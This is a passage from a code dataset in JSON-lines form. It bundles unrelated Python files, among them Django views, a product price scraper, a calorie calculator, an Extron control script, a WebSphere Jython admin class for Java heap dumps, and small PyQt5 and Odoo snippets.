temp:\n y = TiposOfertasIncubacion()\n y.incubacion=i\n y.tipo = Catalogo.objects.get(id=int(a))\n y.save()\n return HttpResponseRedirect('/incubacion')\n except:\n return HttpResponseRedirect('/incubacion')\n\n@decorators.login_required(login_url='/ingresar/')\ndef incubacionDetails(request,identifier):\n i = Incubacion.objects.get(id=int(identifier))\n context = {\"incubacion\":i,}\n\n return render(request,\"incubacion_institucion.html\",context)\n\n\nclass IncDetails(DetailEndpoint):\n model = Incubacion\n\n\nclass IncubadasList(ListEndpoint):\n model = Incubada","sub_path":"incubacion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"54814791","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.3-fat/egg/tw/yui/defaults.py\n# Compiled at: 2010-01-27 10:51:41\n__YUI_VERSION__ = '2.7.0'\n__DEFAULT_LINK_IS_EXTERNAL__ = False\n__YUI_URL_BASE__ = 'http://yui.yahooapis.com'\n__DEFAULT_SUFFIX__ = 'min'","sub_path":"pycfiles/tw.yui-0.9.9-py2.6/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"539658217","text":"import time,json,lxml,re\nfrom lxml import etree\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef maxdateparse(times):\n text=int(times)/1000\n tuptime = time.localtime(text)\n standartime = time.strftime(\"%Y/%m/%d\", tuptime)\n return standartime\n\n\n\ndef info(url):\n print(\"这是历史价格查询!!\")\n res = requests.get(\n url=\"http://p.zwjhl.com/price.aspx?url=\"+url,\n headers={\n 'User-Agent': 'Mozilla/5.0(Macintosh;Intel Mac 05 X 10_11_4)AppleWebKit/537.36(KHTML,like Gecko)Chrome/52.0.2743.116 Safari/537.36'\n })\n soup = BeautifulSoup(res.text, 'lxml')\n minprice=soup.find(attrs={'class':'bigwordprice'}).text.replace('\\n','').replace(' ','')\n textall=soup.find(class_='bigwidth').text\n mindate = re.search('(?<=\\()[^()]*(?=\\))', textall)[0]\n current = re.search('(?<=\\:)(.*)(?=\\.)', textall)[0]\n\n etrees=etree.HTML(res.text)\n maxtext=etrees.xpath('/html/body/div[2]/div/div/div[1]/script')[0].text\n result = re.findall('(?<=\\[)(.*?)(?=\\])', maxtext)[0]\n jg = result.split(',', 2)\n maxdate = int(jg[0])\n maxprice = jg[1]\n\n tuptime = time.localtime(maxdate/1000)\n maxpricedate = time.strftime(\"%Y/%m/%d\", tuptime)\n\n print(minprice,mindate,current,maxprice,maxpricedate)\n\n\nif __name__ == '__main__':\n info(\"http://item.jd.com/100008348532.html\")\n","sub_path":"spyder/newfile.py","file_name":"newfile.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"507507305","text":"class Tdee(object):\n \"\"\"\n Simple class that lets you calculate an approximation of your total\n daily energy expenditure.\n Set lbs=True to insert a weight in pounds.\n \"\"\"\n\n def __init__(self, weight, activity, lbs=False):\n super(Tdee, self).__init__()\n self.weight = weight\n self.activity = activity\n self.lbs = lbs\n self.kcals = None\n\n def convert_to_lbs(self):\n self.converted_weight = self.weight * 2.205\n return self.converted_weight\n\n def calculate(self):\n\n if not self.lbs:\n self.weight = self.convert_to_lbs()\n\n if self.activity == \"1\":\n self.kcals = self.weight * 11\n elif self.activity == \"2\":\n self.kcals = self.weight * 13\n elif self.activity == \"3\":\n self.kcals = self.weight * 19\n\n return int(self.kcals)\n\n\nif __name__ == \"__main__\":\n use_lbs = None\n weight = None\n activity_level = None\n\n while use_lbs != \"1\" and use_lbs != \"2\":\n use_lbs = input(\"What do you use?\\n1. Kgs\\n2. Lbs\\n\")\n if use_lbs == \"1\":\n use_lbs = False\n else:\n use_lbs = True\n\n weight = float(input(\"\\nWhat's your weight?\\n\"))\n\n while activity_level != \"1\" and activity_level != \"2\" and activity_level != \"3\":\n activity_level = input(\"\\nWhat's your activity level?\\n1.Sedentary\\n2.Moderately Active (3 workouts a week)\\n3.Very Active (daily heavy workouts)\\n\")\n\n expenditure = Tdee(weight, activity_level, use_lbs)\n print(f\"\\nYour TDEE is: {expenditure.calculate()}\")\n","sub_path":"tdee.py","file_name":"tdee.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"426123326","text":"## Begin ControlScript Import --------------------------------------------------\nfrom extronlib import event as EVENT, Version as VERSION\n \nfrom extronlib.device import ProcessorDevice as PROCESSORDEVICE, UIDevice as UIDEVICE\n \nfrom extronlib.interface import (EthernetClientInterface as ETHERNETCLIENTINTERFACE ,\nEthernetServerInterface as ETHERNETSERVERINTERFACE, SerialInterface as SERIALINTERFACE, \nIRInterface as IRINTERFACE, RelayInterface as RELAYINTERFACE, ContactInterface as CONTACTINTERFACE, \nDigitalIOInterface as DIGITALIOINTERFACE, FlexIOInterface as FLEXIOINTERFACE, SWPowerInterface as SWPOWERINTERFACE, \nVolumeInterface as VOLUMEINTERFACE)\n \nfrom extronlib.ui import Button as BUTTON, Knob as KNOB, Label as LABEL, Level as LEVEL\n \nfrom extronlib.system import Clock as CLOCK, MESet as MESET, Wait as WAIT \n \nimport time as TIME\n\nprint(\"Script Restarted\")\n\n\n# Lists\nG_NBA = [\"Cavs\", \"Warriors\"]\nG_EPL = [\"Arsenal\", \"Spurs\"]\nG_SportsTeams = [[G_NBA],[G_EPL]]\n\n# Tuples\nG_EPL_Champions = (\"Leicester City\",\"Chelsea\",\"Man City\",\"Manchester United\")\nG_NBA_Champions = (\"Warriors\",\"Spurs\",\"Spurs\")\n\n# Dictionaries\nG_EPL_PFA = {\"Jamie Vardy\":\"Forward\", \"Eden Hazard\":\"Midfielder\", \"Luis Suarez\":\"Forward\"}\nG_NBA_MVP = {\"Steph Curry\":\"Guard\", \"Kevin Durant\":\"Forward\"}\n\n#sets\nG_UCL_Champions_List = [\"Real Madrid\",\"Barcelona\", \"Real Madrid\", \"Bayern Munich\", \"Chelsea\", \"Barcelona\" ]\nG_UCL_Champions_Set = set(G_UCL_Champions_List)\n\n# Extron setup code\nProcessor = PROCESSORDEVICE('pro550')\nTLP = UIDEVICE('tlp1020')\n\nbtnB1 = BUTTON(TLP,1)\nbtnB2 = BUTTON(TLP,2)\nbtnB3 = BUTTON(TLP,3)\nbtnB4 = BUTTON(TLP,4)\nbtnB5 = BUTTON(TLP,5)\nbtnB6 = BUTTON(TLP,6)\nbtnB7 = BUTTON(TLP,7)\nbtnB8 = BUTTON(TLP,8)\nbtnB9 = BUTTON(TLP,9)\nbtnB10 = BUTTON(TLP,10)\n\nlbl11 = LABEL(TLP, 11)\nlbl12 = LABEL(TLP, 12)\nlbl13 = LABEL(TLP, 13)\nlbl14 = LABEL(TLP, 14)\nlbl15 = LABEL(TLP, 15)\n\n\n\ndef DoB1Action(btn, state):\n print(\"List of lists\")\n global G_NBA\n global G_EPL\n \n print(G_EPL)\n \n \n lbl11.SetText(G_EPL)\n \ndef DoB2Action(btn, state):\n print(\"Dictionary\")\n global G_NBA\n global G_EPL\n \n #L_AllSportsTeams = [G_NBA,G_EPL]\n print(G_NBA)\n lbl12.SetText(G_NBA) \n\ndef DoB3Action(btn, state):\n lbl11.SetText(\"\")\n lbl12.SetText(\"\")\n x = 1/0\n \n\n################### Device A\n\n@EVENT(btnB1, 'Pressed')\ndef BtnB1Handler(btn, state):\n DoB1Action(btn, state)\n\n@EVENT(btnB2, 'Pressed')\ndef BtnB2Handler(btn, state):\n DoB2Action(btn, state)\n \n@EVENT(btnB3, 'Pressed')\ndef BtnB3Handler(btn, state):\n DoB3Action(btn, state)\n \n@EVENT(btnB4, 'Pressed')\ndef BtnB4Handler(btn, state):\n DoB4Action(btn, state)\n\n\n@EVENT(btnB5, 'Pressed')\ndef BtnB5Handler(btn, state):\n DoB5Action(btn, state)\n\n\n@EVENT(btnB6, 'Pressed')\ndef BtnB6Handler(btn, state):\n DoB6Action(btn, state) \n \n\ndef Initialize():\n version = VERSION()\n PartNumber = Processor.PartNumber\n Hostname = Processor.Hostname\n IPAddress = Processor.IPAddress\n print(\"Initialized\")\n pass\n\n## Event Definitions --------------------------\n\n## End Events Definitions-------------------------------------------------------\n\nInitialize()\n\nx = 1\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"452311779","text":"\n# Test the example files\n\nimport os\n\nfrom unittest import TestCase\n\nimport stupidbuild.command_line\nprint (stupidbuild)\n\n# Normally tests should not read files. An exception is made here so\n# that we can ensure that the examples always work.\nTESTS_DIR = os.path.dirname(os.path.abspath(__file__))\nHELLOWORLD_PATH = os.path.join(TESTS_DIR, os.pardir,\n '../examples/helloworld.yaml')\nclass TestExamples(TestCase):\n def test_helloworld(self):\n stupidbuild.command_line.run_config(HELLOWORLD_PATH)\n self.assertTrue(True)\n\n","sub_path":"stupidbuild/tests/test_examples.py","file_name":"test_examples.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"397581543","text":"#########################################################################\r\n# MXDeploy\r\n# Copyright MXDeploy 2014\r\n# All Rights Reserved.\r\n#\r\n# Author: Fabio Santos B. da Silva - fsbsilva@gmail.com\r\n# Version: 1.0.0\r\n# Date: 01/01/2014\r\n#\r\n# Purpose: To configure JavaProcessDef\r\n#########################################################################\r\nimport ConfigParser\r\nfrom java.util import ArrayList, HashMap\r\nimport logging\r\nimport os\r\nimport string\r\n\r\nfrom AdminJavaVirtualMachine import AdminJavaVirtualMachine\r\nimport AdminUtil\r\nfrom Velocity import Velocity\r\nfrom com.wds.bean import CustomProperty\r\nfrom com.wds.bean.server import JavaProcessDef, MonitoringPolicy\r\nfrom org.apache.velocity import VelocityContext\r\n\r\n\r\nimport AdminConfig, AdminControl, AdminApp, Help\r\nglobal workbook\r\n\r\n\r\nclass AdminJavaProcessDef:\r\n \r\n def __init__(self, workbook):\r\n self.workbook = workbook\r\n \r\n def update(self, node, server ):\r\n jpd = server.getJavaProcessDef()\r\n \r\n serverID = AdminConfig.getid(\"/Node:\" +node.getName()+\"/Server:\"+server.getName()+\"/\")\r\n processDefID = AdminConfig.list('ProcessDef', serverID)\r\n\r\n environmentAttr = AdminConfig.showAttribute(processDefID, \"environment\")\r\n if( len(environmentAttr)>0):\r\n outlist= AdminUtil.convertToList(environmentAttr)\r\n if( len(outlist)>0 ): \r\n for env in outlist:\r\n AdminConfig.remove(env)\r\n \r\n context = VelocityContext()\r\n context.put(\"workbook\", self.workbook )\r\n context.put(\"node\", node )\r\n context.put(\"server\", server )\r\n context.put(\"javaProcessDef\", jpd )\r\n context.put(\"monitoringPolicy\", server.getJavaProcessDef().getMonitoringPolicy() )\r\n # ATENCION.. The Property Base has a bug. The EnvironmentEntries Name is being saved in Lower Case. \r\n #context.put(\"environmentEntries\", server.getJavaProcessDef().getEnvironmentEntries() )\r\n \r\n propertyName=node.getName()+'_'+server.getName()+\"_JavaProcessDef.properties\"\r\n velocity = Velocity(self.workbook)\r\n velocity.writePropertyBase(context, \"JavaProcessDef.template\", propertyName)\r\n \r\n AdminTask.applyConfigProperties(['-propertiesFileName', self.workbook.CLUSTER_PATH+\"/install/properties/\"+propertyName ])\r\n \r\n # Workaround to update EnvEntries instead of Property Base\r\n self.updateEnvironmentEntries(node, server )\r\n \r\n logging.info(\" JavaProcessDef executed successfully\")\r\n\r\n def enableJavaCoreAndHeapDump(self, nodeName, serverName, options):\r\n envEntArray = []\r\n name = ['name', 'IBM_HEAPDUMP']\r\n value = ['value', 'true' ]\r\n envEntArray.append([name, value])\r\n name = ['name', 'IBM_HEAP_DUMP']\r\n envEntArray.append([name, value])\r\n name = ['name', 'IBM_JAVA_HEAPDUMP_TEXT']\r\n envEntArray.append([name, value])\r\n name = ['name', 'JAVA_DUMP_OPTS']\r\n value = ['value', options ]\r\n envEntArray.append([name, value])\r\n \r\n serverID = AdminConfig.getid(\"/Node:\" +nodeName+\"/Server:\"+serverName+\"/\")\r\n processDefID = AdminConfig.list('ProcessDef', serverID)\r\n\r\n environmentAttr = AdminConfig.showAttribute(processDefID, \"environment\")\r\n if( len(environmentAttr)>0):\r\n outlist= AdminUtil.convertToList(environmentAttr)\r\n if( len(outlist)>0 ):\r\n for env in outlist:\r\n if( string.find(env,'JAVA_DUMP_OPTS') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_HEAPDUMP') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_HEAP_DUMP') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_JAVA_HEAPDUMP_TEXT') != -1 ):\r\n AdminConfig.remove(env) \r\n \r\n AdminConfig.modify(processDefID, [['environment', envEntArray]])\r\n logging.info(\" Java Core and Heap Dump enabled successfully\")\r\n\r\n def disableJavaCoreAndHeapDump(self, nodeName, serverName ):\r\n envEntArray = []\r\n name = ['name', 'IBM_HEAPDUMP']\r\n value = ['value', 'false' ]\r\n envEntArray.append([name, value])\r\n name = ['name', 'IBM_HEAP_DUMP']\r\n envEntArray.append([name, value])\r\n name = ['name', 'IBM_JAVA_HEAPDUMP_TEXT']\r\n envEntArray.append([name, value])\r\n name = ['name', 'JAVA_DUMP_OPTS']\r\n value = ['value', 'ONANYSIGNAL(JAVADUMP,HEAPDUMP),ONINTERRUPT(NONE),ONDUMP(JAVADUMP),ONERROR(NONE),ONEXCEPTION(NONE),ONOUTOFMEMORY(NONE)' ]\r\n envEntArray.append([name, value])\r\n \r\n serverID = AdminConfig.getid(\"/Node:\" +nodeName+\"/Server:\"+serverName+\"/\")\r\n processDefID = AdminConfig.list('ProcessDef', serverID)\r\n\r\n environmentAttr = AdminConfig.showAttribute(processDefID, \"environment\")\r\n if( len(environmentAttr)>0):\r\n outlist= AdminUtil.convertToList(environmentAttr)\r\n if( len(outlist)>0):\r\n for env in outlist:\r\n if( string.find(env,'JAVA_DUMP_OPTS') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_HEAPDUMP') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_HEAP_DUMP') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_JAVA_HEAPDUMP_TEXT') != -1 ):\r\n AdminConfig.remove(env) \r\n \r\n AdminConfig.modify(processDefID, [['environment', envEntArray]])\r\n logging.info(\" Java Core and Heap Dump disabled successfully\")\r\n \r\n def updateEnvironmentEntries(self, node, server ):\r\n nodeName = node.getName()\r\n serverName = server.getName()\r\n envEntries = server.getJavaProcessDef().getEnvironmentEntries()\r\n \r\n hashMap = HashMap()\r\n envEntArray = []\r\n for envEntry in envEntries:\r\n name = ['name', envEntry.getName() ]\r\n value = ['value', envEntry.getValue() ]\r\n envEntArray.append([name, value])\r\n hashMap.put(envEntry.getName(),envEntry.getName())\r\n \r\n serverID = AdminConfig.getid(\"/Node:\" +nodeName+\"/Server:\"+serverName+\"/\")\r\n processDefID = AdminConfig.list('ProcessDef', serverID)\r\n\r\n environmentAttr = AdminConfig.showAttribute(processDefID, \"environment\")\r\n if( len(environmentAttr)>0):\r\n outlist= AdminUtil.convertToList(environmentAttr)\r\n if( len(outlist)>0):\r\n for env in outlist:\r\n if( hashMap.get(env) ):\r\n AdminConfig.remove(env)\r\n \r\n AdminConfig.modify(processDefID, [['environment', envEntArray]])\r\n #logging.info(\" EnvironmentEntries updated successfully\") \r\n\r\n def listJavaCoreAndHeapDump(self, nodeName, serverName ):\r\n serverID = AdminConfig.getid(\"/Node:\" +nodeName+\"/Server:\"+serverName+\"/\")\r\n processDefID = AdminConfig.list('ProcessDef', serverID)\r\n\r\n environmentAttr = AdminConfig.showAttribute(processDefID, \"environment\")\r\n if( len(environmentAttr)>0 ):\r\n outlist= AdminUtil.convertToList(environmentAttr)\r\n if( len(outlist)>0):\r\n for env in outlist:\r\n if( string.find(env,'JAVA_DUMP_OPTS') != -1 ):\r\n value = AdminConfig.showAttribute(env,'value')\r\n logging.info(\" JAVA_DUMP_OPTS: \"+value)\r\n if( string.find(env,'IBM_HEAPDUMP') != -1 ):\r\n value = AdminConfig.showAttribute(env,'value')\r\n logging.info(\" IBM_HEAPDUMP: \"+value) \r\n if( string.find(env,'IBM_HEAP_DUMP') != -1 ):\r\n value = AdminConfig.showAttribute(env,'value')\r\n logging.info(\" IBM_HEAP_DUMP: \"+value) \r\n if( string.find(env,'IBM_JAVA_HEAPDUMP_TEXT') != -1 ):\r\n value = AdminConfig.showAttribute(env,'value')\r\n logging.info(\" IBM_JAVA_HEAPDUMP_TEXT: \"+value) \r\n else:\r\n logging.info(\" Java Core and Heap Dump are disabled\") \r\n \r\n def generateJavaCoreAndHeapDump(self, nodeName, serverName ):\r\n \r\n isRunning = AdminControl.queryNames(\"node=\"+nodeName+\",process=\"+serverName+\",type=Server,*\")\r\n if( len(isRunning)==0 ):\r\n logging.info(\" JVM is stopped. The Java Dumps and Core generation can't be performed.\")\r\n else:\r\n jvm = AdminControl.completeObjectName(\"type=JVM,node=\"+nodeName+\",process=\"+serverName+\",*\")\r\n AdminControl.invoke(jvm, 'dumpThreads')\r\n AdminControl.invoke(jvm, 'generateHeapDump')\r\n AdminControl.invoke(jvm, 'generateSystemDump')\r\n logging.info(\" Java Dumps and Cores were generated successfully\")\r\n \r\n def loadProperty(self, node, server):\r\n SCRIPT_NAME = 'JavaProcessDef.properties'\r\n JPD_FILE_PATH = self.workbook.NODE_PATH+'/'+node.getName()+'/'+server.getName()+'/'+SCRIPT_NAME\r\n \r\n jpd = server.getJavaProcessDef()\r\n mp = jpd.getMonitoringPolicy()\r\n \r\n config = ConfigParser.ConfigParser()\r\n config.optionxform = str\r\n if( os.path.exists(self.workbook.DEPLOYMENT_PATH+\"/\"+SCRIPT_NAME) ):\r\n config.read(self.workbook.DEPLOYMENT_PATH+\"/\"+SCRIPT_NAME)\r\n elif( os.path.exists(JPD_FILE_PATH) ): \r\n config.read(JPD_FILE_PATH)\r\n else:\r\n logging.info(\"JavaProcessDef.properties doesn't exist\" )\r\n return 0\r\n \r\n runAsGroup = config.get('JavaProcessDef','runAsGroup')\r\n runAsUser = config.get('JavaProcessDef','runAsUser')\r\n umask = config.get('JavaProcessDef','umask')\r\n runInProcessGroup = config.get('JavaProcessDef','runInProcessGroup')\r\n processPriority = config.get('JavaProcessDef','processPriority')\r\n\r\n jpd.setUmask(umask)\r\n jpd.setRunAsGroup(runAsGroup) \r\n jpd.setRunAsUser(runAsUser)\r\n jpd.setRunInProcessGroup(runInProcessGroup)\r\n jpd.setProcessPriority(processPriority)\r\n\r\n stderrFilename = config.get('OutputRedirect','stderrFilename')\r\n stdoutFilename = config.get('OutputRedirect','stdoutFilename')\r\n \r\n jpd.setStderrFilename(stderrFilename)\r\n jpd.setStdoutFilename(stdoutFilename)\r\n \r\n autoRestart = config.get('MonitoringPolicy','autoRestart')\r\n maximumStartupAttempts = config.get('MonitoringPolicy','maximumStartupAttempts')\r\n nodeRestartState = config.get('MonitoringPolicy','nodeRestartState')\r\n pingInterval = config.get('MonitoringPolicy','pingInterval')\r\n pingTimeout = config.get('MonitoringPolicy','pingTimeout')\r\n \r\n mp.setAutoRestart(autoRestart)\r\n mp.setMaximumStartupAttempts(maximumStartupAttempts)\r\n mp.setNodeRestartState(nodeRestartState)\r\n mp.setPingInterval(pingInterval)\r\n mp.setPingTimeout(pingTimeout)\r\n \r\n environmentList = ArrayList()\r\n for option in config.options('EnvironmentEntries'):\r\n value = config.get('EnvironmentEntries',option)\r\n \r\n customProperty = CustomProperty()\r\n customProperty.setName(option)\r\n customProperty.setValue(value)\r\n \r\n environmentList.add(customProperty)\r\n \r\n jpd.setEnvironmentEntries(environmentList) \r\n \r\n return 1\r\n \r\n def loadBean(self, nodeName, serverName, isDebug):\r\n serverID = AdminConfig.getid(\"/Node:\"+nodeName+\"/Server:\"+serverName)\r\n javaProcessDefArray = AdminConfig.list('JavaProcessDef',serverID)\r\n javaProcessDefArray = AdminUtil.convertToList(javaProcessDefArray)\r\n javaProcessDefID = javaProcessDefArray[0]\r\n \r\n if( len(javaProcessDefArray) > 1 ):\r\n if( isDebug ):\r\n logging.info( \"+ JavaProcessDef - ERROR - There is more than 1 JavaProcessDef Component\" )\r\n outputRedirectID = AdminConfig.list('OutputRedirect',javaProcessDefArray[1])\r\n if( len(outputRedirectID) > 0 ):\r\n javaProcessDefID = javaProcessDefArray[1]\r\n else: \r\n if( isDebug ):\r\n logging.info( \"+ JavaProcessDef - \" )\r\n \r\n # execution \r\n executionID = AdminConfig.showAttribute(javaProcessDefID,'execution')\r\n runAsGroupAttr = AdminConfig.showAttribute(executionID,'runAsGroup')\r\n runAsUserAttr = AdminConfig.showAttribute(executionID,'runAsUser')\r\n runInProcessGroupAttr = AdminConfig.showAttribute(executionID,'runInProcessGroup')\r\n processPriorityAttr = AdminConfig.showAttribute(executionID,'processPriority')\r\n umaskAttr = AdminConfig.showAttribute(executionID,'umask')\r\n \r\n # OutputRedirect \r\n outputRedirectID = AdminConfig.list('OutputRedirect',serverID)\r\n stderrFilenameAttr = AdminConfig.showAttribute(outputRedirectID,'stderrFilename')\r\n stdoutFilenameAttr = AdminConfig.showAttribute(outputRedirectID,'stdoutFilename')\r\n \r\n javaProcessDef = JavaProcessDef() \r\n javaProcessDef.setRunAsGroup(runAsGroupAttr)\r\n javaProcessDef.setRunAsUser(runAsUserAttr)\r\n javaProcessDef.setUmask(umaskAttr)\r\n javaProcessDef.setRunInProcessGroup(runInProcessGroupAttr)\r\n javaProcessDef.setProcessPriority(processPriorityAttr)\r\n \r\n javaProcessDef.setStderrFilename(stderrFilenameAttr)\r\n javaProcessDef.setStdoutFilename(stdoutFilenameAttr)\r\n\r\n if( isDebug ):\r\n logging.info( \" OutputRedirect - Synchronized\" )\r\n \r\n environmentArray = AdminConfig.showAttribute(javaProcessDefID,'environment')\r\n environmentArray = AdminUtil.convertToList(environmentArray)\r\n for environmentID in environmentArray:\r\n customProperty = CustomProperty()\r\n nameProp = AdminConfig.showAttribute(environmentID,'name')\r\n reqProp = AdminConfig.showAttribute(environmentID,'required')\r\n valueProp = AdminConfig.showAttribute(environmentID,'value')\r\n \r\n customProperty.setName( nameProp )\r\n customProperty.setRequired( reqProp )\r\n customProperty.setValue( valueProp )\r\n \r\n javaProcessDef.addEnvironmentEntry(customProperty) \r\n \r\n if( isDebug ):\r\n logging.info( \" Environment Entries - Synchronized\" )\r\n \r\n ##################################\r\n # START JavaVirtualMachine\r\n ################################## \r\n adminJavaVirtualMachine = AdminJavaVirtualMachine(self.workbook)\r\n adminJavaVirtualMachine.loadBean(nodeName, serverName, javaProcessDef, isDebug)\r\n # END javaVirtualMachine\r\n \r\n ##################################\r\n # START MonitoringPolicy\r\n ################################## \r\n monitoringPolicyID = AdminConfig.list('MonitoringPolicy',serverID)\r\n autoRestartAttr = AdminConfig.showAttribute(monitoringPolicyID,'autoRestart')\r\n maximumStartupAttemptsAttr = AdminConfig.showAttribute(monitoringPolicyID,'maximumStartupAttempts')\r\n nodeRestartStateAttr = AdminConfig.showAttribute(monitoringPolicyID,'nodeRestartState')\r\n pingIntervalAttr = AdminConfig.showAttribute(monitoringPolicyID,'pingInterval')\r\n pingTimeoutAttr = AdminConfig.showAttribute(monitoringPolicyID,'pingTimeout')\r\n \r\n monitoringPolicy = MonitoringPolicy()\r\n monitoringPolicy.setAutoRestart(autoRestartAttr)\r\n monitoringPolicy.setMaximumStartupAttempts(maximumStartupAttemptsAttr)\r\n monitoringPolicy.setNodeRestartState(nodeRestartStateAttr)\r\n monitoringPolicy.setPingInterval(pingIntervalAttr)\r\n monitoringPolicy.setPingTimeout(pingTimeoutAttr)\r\n javaProcessDef.setMonitoringPolicy(monitoringPolicy)\r\n \r\n if( isDebug ):\r\n logging.info( \" MonitoringPolicy - Synchronized\" )\r\n\r\n #END MonitoringPolicy\r\n \r\n return javaProcessDef\r\n \r\n\r\n","sub_path":"jython/ext/AdminJavaProcessDef.py","file_name":"AdminJavaProcessDef.py","file_ext":"py","file_size_in_byte":16818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"491481973","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.arange(-10, 10, 0.1)\nf = 1 / (1 + np.exp(-x))\nplt.xlabel('x')\nplt.ylabel('f(x)')\nplt.plot(x, f)\nplt.axhline(0.5, color='black')\nplt.axvline(0, color='black')\nplt.show()","sub_path":"demo17.py","file_name":"demo17.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"197703495","text":"# -*- coding: utf-8 -*-\n# © 2016 Comunitea\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nfrom openerp import models, fields, api, exceptions, _\nfrom openerp.tools import html_escape as escape\nfrom openerp.addons.base.ir.ir_qweb import HTMLSafe\n\n\nclass Contact(models.AbstractModel):\n _inherit = 'ir.qweb.field.contact'\n\n def record_to_html(self, cr, uid, field_name, record, options=None, context=None):\n if context is None:\n context = {}\n\n if options is None:\n options = {}\n opf = options.get('fields') or [\"name\", \"address\", \"phone\", \"mobile\", \"fax\", \"email\"]\n\n value_rec = record[field_name]\n if not value_rec:\n return None\n value_rec = value_rec.sudo().with_context(show_address=True)\n value = value_rec.name_get()[0][1]\n\n val = {\n 'name': value.split(\"\\n\")[0],\n 'address': escape(\" \".join(value.split(\"\\n\")[1:])),\n 'phone': value_rec.phone,\n 'mobile': value_rec.mobile,\n 'fax': value_rec.fax,\n 'city': value_rec.city,\n 'country_id': value_rec.country_id.display_name,\n 'website': value_rec.website,\n 'email': value_rec.email,\n 'vat': value_rec.vat,\n 'fields': opf,\n 'object': value_rec,\n 'options': options\n }\n val['address'] = val['address'].replace(val['country_id'], '')\n html = self.pool[\"ir.ui.view\"].render(cr, uid, \"base.contact\", val, engine='ir.qweb', context=context).decode('utf8')\n\n return HTMLSafe(html)\n","sub_path":"project-addons/custom_report/models/ir_qweb.py","file_name":"ir_qweb.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"631538843","text":"from datetime import datetime\nfrom datetime import date\nfrom pandas import Timedelta\n\n\ndef __returnDate__(year, month, day):\n weekend = ['(월)', '(화)', '(수)', '(목)', '(금)', '(토)', '(일)']\n idx = date(year, month, day).weekday()\n return weekend[idx]\n\n\ndef __returnDayCount__(year, month):\n if month == 12:\n current_month = datetime(year, month, 1, 0, 0, 0)\n next_month = datetime(year + 1, 1, 1, 0, 0, 0)\n days = Timedelta(next_month - current_month).days\n else:\n current_month = datetime(year, month, 1, 0, 0, 0)\n next_month = datetime(year, month + 1, 1, 0, 0, 0)\n days = Timedelta(next_month - current_month).days\n return days\n\n\ndef returnDateList(year):\n year = int(year)\n dateList = []\n for month in range(1, 13):\n days = __returnDayCount__(year, month) + 1\n for day in range(1, days):\n textMonth = f\"0{month}\" if month < 10 else f\"{month}\"\n textDay = f\"0{day}\" if day < 10 else f\"{day}\"\n textDate = __returnDate__(year, month, day)\n dateList.append(f\"{textMonth}/{textDay}{textDate}\")\n return dateList\n","sub_path":"method/dateList.py","file_name":"dateList.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"235165003","text":"from PyQt5.QtWidgets import *\nimport sys\n\n\nclass Window(QMainWindow):\n def __init__(self):\n super().__init__()\n title = \"Tile of window\"\n self.setWindowTitle(title)\n self.setGeometry(800, 400, 500, 300)\n self.show()\n\n\nApp = QApplication(sys.argv)\nwindow = Window()\nsys.exit(App.exec())\n","sub_path":"pythongui/firstqt5.py","file_name":"firstqt5.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"312395069","text":"\"\"\"Helper functions to create and test pyffi-based geometry blocks\"\"\"\n\n# ***** BEGIN LICENSE BLOCK *****\n# \n# Copyright © 2005-2013, NIF File Format Library and Tools contributors.\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# \n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# \n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# \n# * Neither the name of the NIF File Format Library and Tools\n# project nor the names of its contributors may be used to endorse\n# or promote products derived from this software without specific\n# prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 